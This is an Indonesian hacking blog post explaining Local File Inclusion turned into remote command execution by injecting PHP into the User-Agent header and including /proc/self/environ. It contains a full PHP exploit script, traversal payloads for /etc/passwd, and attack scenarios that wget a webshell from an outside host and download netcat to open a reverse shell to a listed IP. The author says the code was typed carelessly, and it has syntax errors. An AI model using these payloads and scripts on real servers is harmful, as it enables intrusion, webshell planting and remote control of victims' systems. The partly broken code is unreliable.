• Beranda
  • Autosultan
  • Bitcoin
  • Dollar
  • Linux
  • LOKER
  • Printer
  • Sofware
  • sosial
  • TISniper
  • Virus
  • Windows

T.I Sniper

#Expert Advisor for MetaTrader 4 #Expert Advisor for MetaTrader 5 #youtube #google #free dollar business every day #Lowongan #Pekerjaan #Loker #forex #trading Autopilot #mining crypto #Update #Tutorial #Komputer Perbaikan, #Email #Facebook , #whatsapp ,#instagram #telegram ,#Internet ,#Motivasi , #Crypto , #AirDrop, #Bitcoin, #Ethereum, #Binance coin, #Cardano, #Degocoin, #Litecoin #Indodax, #Coinbase, #Nexo Dan Mata Uang Digital Lain , #Website, Perbaikan #Server #Domain , #Hosting, #Whm

    • Beranda
    • Contact Forum
    • Coffee JKs88
    • Tentang Kami
    • Parse Code Html
    • Text Terbalik
    • Privacy Policy

    Ikuti Kami!

    Follow Akun Instagram Kami Dapatkan Notifikasi Terbaru!
    Ikuti Kami di Facebok! Untuk mendapatkan notifikasi terbaru.

    Postingan Populer

    Backlink dengan Google Dork Seo

    Dork Seo
    Januari 01, 2016
    0

    Cara Dapat Backlink dengan Google Dork

    Dork Seo
    Februari 13, 2016
    0

    Cara Dapat Backlink Edu Gratis

    Seo
    Februari 13, 2016
    0

    Download File ISO Windows 11 Dan Bootable USB Rufus

    Sofware Windows
    Desember 02, 2021
    0

    FORUM 

    FORUM
    Desember 31, 2021
    0
    Author
    chmood
    Tautan disalin ke papan klip!
    Share Posts "LFI Remote Command Execution"
  • Salin link
  • Simpan Ke Daftar Bacaan
  • Bagikan ke Facebook
  • Bagikan ke Twitter
  • Bagikan ke Pinterest
  • Bagikan ke Telegram
  • Bagikan ke Whatsapp
  • Bagikan ke Tumblr
  • Bagikan ke Line
  • Bagikan ke Email
  • HomeExploitationsLFI Remote Command Execution
    LFI Remote Command Execution

    LFI Remote Command Execution

    Simpan Postingan

    :: LFI Remote Command Execution (PoC - Code - Exploit)::


    Local File Inclusion (LFI) sama halnya dengan RFI. perbedaannya adalah, kalau rfi, kita mengincludkan file secara remote. Sedangkan LFI, kita bisa mengincludekan file yang ada di komputer victim. Dari sifatnya inilah, kita bisa memanfaatkanya untuk menyusup ke server secara lebih dalam. banyak methode yg bisa kita lakukan, misal dengan menginjeksi apache log access, dll. mengenai teknik apache log injection, sudah gw tulis, tinggal upload aja.

    Pada tutorial kali ini, gw coba menjelaskan bagaimana membuat sebuah Remote Command Execution (RCE) pada LFI dengan memanfaatkan ENVIRON (/proc/self/environ). Bagaimana file environ ini bisa menjadi sebuah RCE melalui LFI? jawabanya simple, karena kita bisa menginclude file environ ini, dan kita bisa memanipulasi header browser kita untuk mengirim membuat sebuah RCE dan mengexploitasinya. bingung? sama, gw jg bingung.

    teknik injeksi lfi, seperti pada umumnya, kita harus menemukan dulu direktori utama dari server ini. teknik kuno yg ampuh adalah dengan mencoba satu persatu, dan menaikan ke tingkat direktori di atasnya. perhatikan:

    http://site.com/buglfi.php?exp=../etc/passwd <<< percobaan pertama naik 1 direktori di atas. 


    bila gagal, naikan lagi ke direktori di atasnya lagi :

    http://site.com/buglfi.php?exp=../../etc/passwd
    http://site.com/buglfi.php?exp=../../../etc/passwd
    http://site.com/buglfi.php?exp=../../../../etc/passwd <<< terus naik sampai file /etc/passwd terinclude.



    contoh isi dari /etc/passwd

    root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin



    bila menemui halaman berisi seperti itu, berarti sudah ketemu letak direktori root. misal :

    http://site.com/buglfi.php?exp=../../../../../etc/passwd



    itu adalah teknik mendasar dari LFI. teknik tersebut tetep di perlukan untuk menemukan direktori root.

    next, seperti yg gw katakan tadi, kita akan membuat RCE melalui ENVIRON.

    Langsung aja kita include file environ ini.

    http://site.com/buglfi.php?exp=../../../../../proc/self/environ


    injek dan dapatkan output dari file ini. apa yang terlihat?

    DOCUMENT_ROOT=/home/rialto/public_html?GATEWAY_INTERFACE=CGI/1.1?HTTP_ACCEPT=text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5?HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7?HTTP_ACCEPT_ENCODING=gzip,deflate?HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5?HTTP_CONNECTION=keep-alive?HTTP_HOST=www.liveattherialto.com?HTTP_KEEP_ALIVE=300?HTTP_USER_AGENT=[b]Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404[/b]



    perhatikan output tersebut. amati apa yg tampak. cari2 apa yg bisa kita manfaatkan. cari detil demi detil. putar otak kiri kanan atas bawah. ketemu? yap. bener. itu dia. qe3.

    perhatikan text yg tak tebalkan. itu adalah user agent. informasi yg di berikan oleh "browser kita" ke server. yg berarti informasi tersebut "di kirim oleh browser kita" ke server. seip. baca 5x klo g paham. itu muncul mozilla karena gw emang pakai mozilla firefox. info itu di kirim oleh browserq ke server victim. baca paragraf ini sampai paham.

    sekarang kita inget hal penting dalam hacking, pengetahuan basic dari webhacking :
    "sesuatu (input,variable,script) yang di kirimkan dari browser, bisa di manipulasi melalui browser agar di proses oleh server".

    Lalu apa hubunganya hal ini dengan inject environ? simple sob. Perhatikan output yang kita terima setelah kita menginclude file environ. informasi useragent dari browser kita di tampilkan oleh file ini, berarti kita bisa memanipulasi user agent ini sesuai yang kita inginkan. Salah satunya mengirimkan perintah jahat ke victim ((demit mode on)).

    Untuk manipulasi header ini, ada cara yg sangat mudah, yaitu dengan menggunakan addons firefox bernama tamper. but gw g akan menggunakan cara instan seperti itu, karena kita sedang belajar. Jadi gw akan jelaskan Proof Of Concept nya se mampu gw. qe3.

    OK. Next --> Coding.
    gw harap g bosen ama coding. karena kita hidup di dunia 0 dan 1, jd mau tidak mau harus selalu berususan dengan coding.

    ###[ HTTPQUERY pada PHP ]###
    http query berfungsi untuk melakukan koneksi ke sebuah host melalui protokol http, kemudian mengambil output dari hasil query. ringkasnya httpquery bersifat seperti web browser.


    $sock = fsockopen("sasaran.com","80",$errno,$errstr,30); // lakukan koneksi ke sasaran.com port 80
    $get = "GET /index.php HTTP/1.1\r\n". // minta file index.php (browsing membuka file index.php)
    "Host: sasaran.com\r\n". // hostname
    "Accept: */*\r\n". // accepted methode
    "User-Agent: Mozilla/5.0 \r\n". // [b]USER AGENT[/B]
    "Connection: Close\r\n\r\n"; // tutup koneksi
    fputs($sock,$get); // kirimkan request
    while (!feof($sock)) { // ambil output yg di terima dari hasil kirim request
    $output .= trim(fgets($sock, 3600))."\n";
    }
    fclose($sock); // tutup koneksi
    echo $output; // tulis/cetak hasil httpquery
    ?>



    dengan cara seperti ini, kita akan mendapatkan hasil yang sama dengan browsing menggunakan browser. bedanya kita bebas mengirimkan header http apa aja. perhatikan bagian USER AGENT. di situ gw tuliskan Mozilla/5.0. sehingga informasi browser yang di terima oleh sasaran.com adalah Mozilla/5.0. Kalau user agent gw isi dengan nama gw, maka server akan mengetahui kalau useragent adalah ArRay.

    "User-Agent: ArRay \r\n"


    sehingga, hasil output ke browser, akan tertulis useragent adalah ArRay.

    dengan cara seperti ini, kita bisa menyisipkan malicious code ke server.

    "User-Agent: Mozilla/5.0 \r\n"



    dengan cara seperti itu, maka shell command uname -a dan ls -la akan di jalankan di sasaran.com dan hasilnya di cetak di browser. jadilah sebuah teknik menginjeksi yg mudah. begitulan PoC dasar dari teknik ini.


    $sock = fsockopen("sasaran.com","80",$errno,$errstr,30);
    $get = "GET /index.php HTTP/1.1\r\n".
    "Host: sasaran.com\r\n".
    "Accept: */*\r\n".
    "User-Agent: Mozilla/5.0 \r\n".
    "Connection: Close\r\n\r\n";
    fputs($sock,$get);
    while (!feof($sock)) {
    $output .= trim(fgets($sock, 3600))."\n";
    }
    fclose($sock);
    echo $output;
    ?>



    dengan merubah user agent, kita bisa mengirimkan command apa aja ke server. sebuah malicious yg mudah dan menyenangkan. kita bisa merubahnya dan menjalankan satu demi satu.

    seperti yg gw katakan tadi, kita akan membuat sebuah RCE. Sehingga kita bisa mengirimkan command2 ke server dengan mudah layaknya menginjeksi bug RCE, tanpa harus edit2 coding lg. kita tinggal mengedit code tersebut menjadi lebih otomatis.

    contoh berikut, gw membuat script nya untuk di jalankan di command line interface. dengan script berikut, gw akan mengirimkan command ke server dengan cara berikut (in CLI misanl SSH):


    ./lfi "http://sasaran.com/buglfi.php?example=[command-command ke server]"
    ./lfi "http://sasaran.com/buglfi.php?example=[uname -a; pwd; ls -la; find ./ -perm 777 -type d]" << contoh


    #!/usr/bin/php
    //ambil variable
    $com = str_replace('"','',$_SERVER['argv'][1]); // hilangkan petik
    $sub = explode("[",$com); // pisah bug dengan command
    $url = str_replace("http://","",$sub[0]); // url
    $site= explode("/",$url,0); // sitename
    $bug = str_replace($site."/","",$url); // bug path
    $cmd = substr($sub[1],0,(str_len($sub[1])-1)); // command

    //dapatkan path direktori utama
    $path = '/';
    while(!$mainpath){
    $output = false;
    $sock = fsockopen($site,"80",$errno,$errstr,15);
    $get = "GET /".$bug.$path"etc/passwd HTTP/1.1\r\n".
    "Host: ".$site."\r\n".
    "Accept: */*\r\n".
    "User-Agent: Mozilla/5.0\r\n".
    "Connection: Close\r\n\r\n";
    fputs($sock,$get);
    while (!feof($sock)) {
    $output .= trim(fgets($sock, 3600))."\n";
    }
    fclose($sock);
    if(eregi("root:",$output)){
    $mainpath = $path;
    }
    $path .= "../";
    }

    // hentikan exploitasi jika tidak mendapatkan main direktori path
    if(!$mainpath){
    print "Failed!\r\n"; exit();
    }

    //injek environ
    $output = false;
    $sock = fsockopen($site,"80",$errno,$errstr,15);
    $get = "GET /".$bug.$mainpath"proc/self/environ HTTP/1.1\r\n".
    "Host: ".$site."\r\n".
    "Accept: */*\r\n".
    "User-Agent: Mozilla/5.0 '.system('".$cmd."').'[XCREW]';\r\n".
    "Connection: Close\r\n\r\n";
    fputs($sock,$get);
    while (!feof($sock)) {
    $output .= trim(fgets($sock, 3600))."\n";
    }
    fclose($sock);

    //failed jika tidak bisa include environ/gagal
    if(!eregi("[XCREW]",$output)){
    print "Failed!\r\n"; exit();
    }

    //ambil output command
    $result = explode("[XCREW]",$output);
    $hasilcommand = $result[1];

    print $hasilcommand."\r\n";
    exit();
    ?>



    seip. dengan script sederhana tersebut, gw dpt RCE dari LFI.

    ####[ Scenario upload webshell ]####


    ./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
    ./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/bd.txt; mv bd.txt bd.php]"



    Shell uploaded to http://sasaran.com/writeable/dir/bd.php :ngakak:

    ####[ Scenario backconnect ]####

    ./lfi "http://sasaran.com/buglfi.php?example=[find ./ -type d -perm 777]"
    ./lfi "http://sasaran.com/buglfi.php?example=[cd writeable/dir/; wget http://shell.ku/nc;]"
    ./lfi "http://sasaran.com/buglfi.php?example=[writeable/dir/nc -vv 202.212.22.11 9999 -e /bin/bash &]"





    qeqeqeqeqeqeqe

    begitulah, salah satu jurus exploitasi lfi. pada teknik ini, selain belajar teknik lfi, kita juga secara tidak langsung belajar untuk mengirimkan command dengan manipulasi header http yang memanfaatkan sifat dari server. teknik seperti ini juga bisa di pakai pada bug lain yang memiliki sifat yg sama, yaitu mencetak informasi yang dikirim dari browser. karena, segala sesuatu yang di kirimkan dari browser bisa kita manipulasi sesuka kita. ini adalah hukum alam. qeqeeqeqe. kembangin sendiri script tersebut. sempurnain, cz itu juga asal ketik. qeqeqe karna nga bisa copy paste aye kunci :3 



    Thanks
    Exploitations
    September 23, 2015 • 0 komentar
    Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.
    Isi dari komentar adalah tanggung jawab dari pengirim. T.I Sniper mempunyai hak untuk tidak memperlihatkan komentar yang tidak etis atau kasar. Jika ada komentar yang melanggar aturan ini, tolong dilaporkan.

    T.I Sniper

    Your description here

    • Follow
    • Autosultan
    • Wa Admin Bisnis
    Copyright ©2010 - 2022 🔥 T.I Sniper.
    • Beranda
    • Cari
    • Posting
    • Trending
    • Tersimpan